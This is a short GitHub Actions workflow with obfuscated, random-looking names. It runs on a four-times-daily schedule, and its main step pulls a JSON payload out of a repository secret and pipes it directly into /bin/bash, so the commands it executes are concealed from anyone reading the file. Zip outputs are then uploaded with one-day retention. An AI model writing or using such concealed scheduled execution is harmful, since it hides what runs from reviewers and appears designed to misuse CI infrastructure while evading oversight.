name: ruiqiuchunlu
on:
  workflow_dispatch:

  schedule:
    - cron: '7 5,11,17,23 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: ruiqiuchunlu
        env:
          lww4: ${{ secrets.lww4 }}
        run: |
          printf '%s' "$lww4" | jq -r .za5 | /bin/bash
          echo $kmv546 | jq -r .iyc3520 | /bin/bash

      - name: Upload artifact
        uses: actions/upload-artifact@v4
        with:
          name: ttjfYl6F
          path: "*.zip"
          retention-days: 1
